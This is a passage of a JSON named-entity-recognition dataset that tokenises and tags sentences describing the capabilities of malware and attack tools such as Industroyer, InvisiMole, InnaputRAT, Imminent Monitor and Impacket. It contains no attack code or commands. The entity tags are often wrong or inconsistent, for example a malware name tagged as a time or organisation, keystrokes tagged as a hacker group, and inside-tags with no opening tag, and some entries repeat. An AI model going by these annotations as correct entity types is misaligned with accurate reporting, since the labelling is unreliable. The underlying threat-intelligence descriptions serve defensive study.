"detection", - "from", - "email", - "gateways;", - "the", - "debugger", - "also", - "encrypts", - "information", - "before", - "sending", - "to", - "the", - "C2." - ], - "ner_tags": [ - "B-Time", - "B-SecTeam", - "O", - "O", - "O", - "B-Way", - "B-SecTeam", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Imminent", - "Monitor", - "has", - "a", - "\"Process", - "Watcher\"", - "feature", - "to", - "monitor", - "processes", - "in", - "case", - "the", - "client", - "ever", - "crashes", - "or", - "gets", - "closed." - ], - "ner_tags": [ - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Imminent", - "Monitor", - "has", - "a", - "module", - "for", - "performing", - "remote", - "desktop", - "access." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Imminent", - "Monitor", - "has", - "the", - "capability", - "to", - "run", - "a", - "cryptocurrency", - "miner", - "on", - "the", - "victim", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Imminent", - "Monitor", - "has", - "a", - "remote", - "webcam", - "monitoring", - "capability." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Impacket", - "modules", - "like", - "GetUserSPNs", - "can", - "be", - "used", - "to", - "get", - "Service", - "Principal", - "Names", - "(SPNs)", - "for", - "user", - "accounts.", - "The", - "output", - "is", - "formatted", - "to", - "be", - "compatible", - "with", - "cracking", - "tools", - "like", - "John", - "the", - "Ripper", - "and", - "Hashcat." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Impacket", - "modules", - "like", - "ntlmrelayx", - "and", - "smbrelayx", - "can", - "be", - "used", - "in", - "conjunction", - "with", - "Network", - "Sniffing", - "and", - "LLMNR/NBT-NS", - "Poisoning", - "and", - "SMB", - "Relay", - "to", - "gather", - "NetNTLM", - "credentials", - "for", - "Brute", - "Force", - "or", - "relay", - "attacks", - "that", - "can", - "gain", - "code", - "execution." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "B-SecTeam", - "O", - "B-Way", - "B-Tool", - "O", - "B-Way", - "B-Tool", - "O", - "B-Purp", - "B-Way", - "B-Features", - "O", - "B-Idus", - "B-HackOrg", - "O", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SecretsDump", - "and", - "Mimikatz", - "modules", - "within", - "Impacket", - "can", - "perform", - "credential", - "dumping", - "to", - "obtain", - "account", - "and", - "password", - "information." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "SecretsDump", - "and", - "Mimikatz", - "modules", - "within", - "Impacket", - "can", - "perform", - "credential", - "dumping", - "to", - "obtain", - "account", - "and", - "password", - "information." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "SecretsDump", - "and", - "Mimikatz", - "modules", - "within", - "Impacket", - "can", - "perform", - "credential", - "dumping", - "to", - "obtain", - "account", - "and", - "password", - "information", - "from", - "NTDS.dit." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Impacket", - "can", - "be", - "used", - "to", - "sniff", - "network", - "traffic", - "via", - "an", - "interface", - "or", - "raw", - "socket." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SecretsDump", - "and", - "Mimikatz", - "modules", - "within", - "Impacket", - "can", - "perform", - "credential", - "dumping", - "to", - "obtain", - "account", - "and", - "password", - "information." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Impacket", - "contains", - "various", - "modules", - "emulating", - "other", - "service", - "execution", - "tools", - "such", - "as", - "PsExec." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Impacket's", - "wmiexec", - "module", - "can", - "be", - "used", - "to", - "execute", - "commands", - "through", - "WMI." - ], - "ner_tags": [ - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Industroyer", - "uses", - "a", - "custom", - "DoS", - "tool", - "that", - "leverages", - "CVE-2015-5374", - "and", - "targets", - "hardcoded", - "IP", - "addresses", - "of", - "Siemens", - "SIPROTEC", - "devices." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Industroyer", - "has", - "used", - "a", - "Trojanized", - "version", - "of", - "the", - "Windows", - "Notepad", - "application", - "for", - "an", - "additional", - "backdoor", - "persistence", - "mechanism." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Industroyer’s", - "data", - "wiper", - "module", - "clears", - "registry", - "keys", - "and", - "overwrites", - "both", - "ICS", - "configuration", - "and", - "Windows", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Industroyer", - "decrypts", - "code", - "to", - "connect", - "to", - "a", - "remote", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Industroyer", - "sends", - "information", - "about", - "hardware", - "profiles", - "and", - "previously-received", - "commands", - "back", - "to", - "the", - "C2", - "server", - "in", - "a", - "POST-request." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Industroyer’s", - "data", - "wiper", - "component", - "enumerates", - "specific", - "files", - "on", - "all", - "the", - "Windows", - "drives." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Industroyer", - "downloads", - "a", - "shellcode", - "payload", - "from", - "a", - "remote", - "C2", - "server", - "and", - "loads", - "it", - "into", - "memory." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Industroyer", - "used", - "Tor", - "nodes", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Tool", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Industroyer", - "uses", - "a", - "custom", - "port", - "scanner", - "to", - "map", - "out", - "a", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Industroyer", - "uses", - "heavily", - "obfuscated", - "code", - "in", - "its", - "Windows", - "Notepad", - "backdoor." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Industroyer", - "attempts", - "to", - "perform", - "an", - "HTTP", - "CONNECT", - "via", - "an", - "internal", - "proxy", - "to", - "establish", - "a", - "tunnel." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Industroyer", - "has", - "a", - "data", - "wiper", - "component", - "that", - "enumerates", - "keys", - "in", - "the", - "Registry", - "<code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Industroyer", - "can", - "enumerate", - "remote", - "computers", - "in", - "the", - "compromised", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Industroyer’s", - "data", - "wiper", - "module", - "writes", - "zeros", - "into", - "the", - "registry", - "keys", - "in", - "<code>SYSTEM\\CurrentControlSet\\Services</code>", - "to", - "render", - "a", - "system", - "inoperable." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Industroyer", - "collects", - "the", - "victim", - "machine’s", - "Windows", - "GUID." - ], - "ner_tags": [ - "B-Idus", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Industroyer’s", - "61850", - "payload", - "component", - "enumerates", - "connected", - "network", - "adapters", - "and", - "their", - "corresponding", - "IP", - "addresses." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Industroyer", - "can", - "use", - "supplied", - "user", - "credentials", - "to", - "execute", - "processes", - "and", - "stop", - "services." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Industroyer’s", - "main", - "backdoor", - "connected", - "to", - "a", - "remote", - "C2", - "server", - "using", - "HTTPS." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Industroyer", - "can", - "use", - "an", - "arbitrary", - "system", - "service", - "to", - "load", - "at", - "system", - "boot", - "for", - "persistence", - "and", - "replaces", - "the", - "ImagePath", - "registry", - "value", - "of", - "a", - "Windows", - "service", - "with", - "a", - "new", - "backdoor", - "binary." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Industroyer2", - "has", - "the", - "ability", - "to", - "cyclically", - "enumerate", - "running", - "processes", - "such", - "as", - "PServiceControl.exe,", - "PService_PDD.exe,", - "and", - "other", - "targets", - "supplied", - "through", - "a", - "hardcoded", - "configuration." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InnaputRAT", - "has", - "a", - "command", - "to", - "delete", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "InnaputRAT", - "enumerates", - "directories", - "and", - "obtains", - "file", - "attributes", - "on", - "a", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InnaputRAT", - "variants", - "have", - "attempted", - "to", - "appear", - "legitimate", - "by", - "adding", - "a", - "new", - "service", - "named", - "OfficeUpdateService." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "InnaputRAT", - "variants", - "have", - "attempted", - "to", - "appear", - "legitimate", - "by", - "using", - "the", - "file", - "names", - "SafeApp.exe", - "and", - "NeutralApp.exe." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "InnaputRAT", - "uses", - "the", - "API", - "call", - "ShellExecuteW", - "for", - "execution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "InnaputRAT", - "uses", - "an", - "8-byte", - "XOR", - "key", - "to", - "obfuscate", - "API", - "names", - "and", - "other", - "strings", - "contained", - "in", - "the", - "payload." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Some", - "InnaputRAT", - "variants", - "establish", - "persistence", - "by", - "modifying", - "the", - "Registry", - "key", - "<code>HKU\\<SID>\\Software\\Microsoft\\Windows\\CurrentVersion\\Run:%appdata%\\NeutralApp\\NeutralApp.exe</code>." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "InnaputRAT", - "gathers", - "volume", - "drive", - "information", - "and", - "system", - "information." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InnaputRAT", - "launches", - "a", - "shell", - "to", - "execute", - "commands", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Some", - "InnaputRAT", - "variants", - "create", - "a", - "new", - "Windows", - "service", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "enumerate", - "windows", - "and", - "child", - "windows", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "uses", - "a", - "variation", - "of", - "the", - "XOR", - "cipher", - "to", - "encrypt", - "files", - "before", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "use", - "zlib", - "to", - "compress", - "and", - "decompress", - "data." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "uses", - "WinRAR", - "to", - "compress", - "data", - "that", - "is", - "intended", - "to", - "be", - "exfiltrated." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "inject", - "its", - "code", - "into", - "a", - "trusted", - "process", - "via", - "the", - "APC", - "queue." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "record", - "sound", - "using", - "input", - "audio", - "devices." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "sort", - "and", - "collect", - "specific", - "documents", - "as", - "well", - "as", - "generate", - "a", - "list", - "of", - "all", - "files", - "on", - "a", - "newly", - "inserted", - "drive", - "and", - "store", - "them", - "in", - "an", - "encrypted", - "file." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "use", - "fileless", - "UAC", - "bypass", - "and", - "create", - "an", - "elevated", - "COM", - "object", - "to", - "escalate", - "privileges." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "use", - "the", - "<code>ITaskService</code>,", - "<code>ITaskDefinition</code>", - "and", - "<code>ITaskSettings</code>", - "COM", - "interfaces", - "to", - "schedule", - "a", - "task." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "register", - "itself", - "for", - "execution", - "and", - "persistence", - "via", - "the", - "Control", - "Panel." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "be", - "launched", - "by", - "using", - "DLL", - "search", - "order", - "hijacking", - "in", - "which", - "the", - "wrapper", - "DLL", - "is", - "placed", - "in", - "the", - "same", - "folder", - "as", - "explorer.exe", - "and", - "loaded", - "during", - "startup", - "into", - "the", - "Windows", - "Explorer", - "process", - "instead", - "of", - "the", - "legitimate", - "library." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "has", - "used", - "a", - "custom", - "implementation", - "of", - "DNS", - "tunneling", - "to", - "embed", - "C2", - "communications", - "in", - "DNS", - "requests", - "and", - "replies." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "collect", - "data", - "from", - "the", - "system,", - "and", - "can", - "monitor", - "changes", - "in", - "specified", - "directories." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "collect", - "jpeg", - "files", - "from", - "connected", - "MTP", - "devices." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "decrypt,", - "unpack", - "and", - "load", - "a", - "DLL", - "from", - "its", - "resources,", - "or", - "from", - "blobs", - "encrypted", - "with", - "Data", - "Protection", - "API,", - "two-key", - "triple", - "DES,", - "and", - "variations", - "of", - "the", - "XOR", - "cipher." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "has", - "a", - "command", - "to", - "disable", - "routing", - "and", - "the", - "Firewall", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "use", - "Data", - "Protection", - "API", - "to", - "encrypt", - "its", - "components", - "on", - "the", - "victim’s", - "computer,", - "to", - "evade", - "detection,", - "and", - "to", - "make", - "sure", - "the", - "payload", - "can", - "only", - "be", - "decrypted", - "and", - "loaded", - "on", - "one", - "specific", - "compromised", - "computer." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "has", - "installed", - "legitimate", - "but", - "vulnerable", - "Total", - "Video", - "Player", - "software", - "and", - "wdigest.dll", - "library", - "drivers", - "on", - "compromised", - "hosts", - "to", - "exploit", - "stack", - "overflow", - "and", - "input", - "validation", - "vulnerabilities", - "for", - "code", - "execution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "has", - "exploited", - "CVE-2007-5633", - "vulnerability", - "in", - "the", - "speedfan.sys", - "driver", - "to", - "obtain", - "kernel", - "mode", - "privileges." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "spread", - "within", - "a", - "network", - "via", - "the", - "BlueKeep", - "(CVE-2019-0708)", - "and", - "EternalBlue", - "(CVE-2017-0144)", - "vulnerabilities", - "in", - "RDP", - "and", - "SMB", - "respectively." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Features", - "O", - "B-Way", - "B-Features", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "InvisiMole", - "can", - "identify", - "proxy", - "servers", - "used", - "by", - "the", - "victim", - "and", - "use", - "them", - "for", - "C2", - "communication." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "has", - "been", - "configured", - "with", - "several", - "servers", - "available", - "for", - "alternate", - "C2", - "communications." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "has", - "deleted", - "files", - "and", - "directories", - "including", - "XML", - "and", - "files", - "successfully", - "uploaded", - "to", - "C2", - "servers." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "list", - "information", - "about", - "files", - "in", - "a", - "directory", - "and", - "recently", - "opened", - "or", - "used", - "documents.", - "InvisiMole", - "can", - "also", - "search", - "for", - "specific", - "files", - "by", - "supplied", - "file", - "mask." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "create", - "hidden", - "system", - "directories." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "InvisiMole", - "has", - "executed", - "legitimate", - "tools", - "in", - "hidden", - "windows." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "has", - "undergone", - "regular", - "technical", - "improvements", - "in", - "an", - "attempt", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "upload", - "files", - "to", - "the", - "victim's", - "machine", - "for", - "operations." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "can", - "remove", - "all", - "system", - "restore", - "points." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "B-HackOrg" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "function", - "as", - "a", - "proxy", - "to", - "create", - "a", - "server", - "that", - "relays", - "communication", - "between", - "the", - "client", - "and", - "C&C", - "server,", - "or", - "between", - "two", - "clients." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "use", - "a", - "JavaScript", - "file", - "as", - "part", - "of", - "its", - "execution", - "chain." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "capture", - "keystrokes", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "has", - "used", - "ListPlanting", - "to", - "inject", - "code", - "into", - "a", - "trusted", - "process." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "has", - "a", - "command", - "to", - "list", - "account", - "information", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "determines", - "a", - "working", - "directory", - "where", - "it", - "stores", - "all", - "the", - "gathered", - "data", - "about", - "the", - "compromised", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "deliver", - "trojanized", - "versions", - "of", - "software", - "and", - "documents,", - "relying", - "on", - "user", - "execution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "has", - "attempted", - "to", - "disguise", - "itself", - "by", - "registering", - "under", - "a", - "seemingly", - "legitimate", - "service", - "name." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "has", - "disguised", - "its", - "droppers", - "as", - "legitimate", - "software", - "or", - "documents,", - "matching", - "their", - "original", - "names", - "and", - "locations,", - "and", - "saved", - "its", - "files", - "as", - "mpr.dll", - "in", - "the", - "Windows", - "folder." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "has", - "a", - "command", - "to", - "create,", - "set,", - "copy,", - "or", - "delete", - "a", - "specified", - "Registry", - "key", - "or", - "value." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "B-Features", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "use", - "winapiexec", - "tool", - 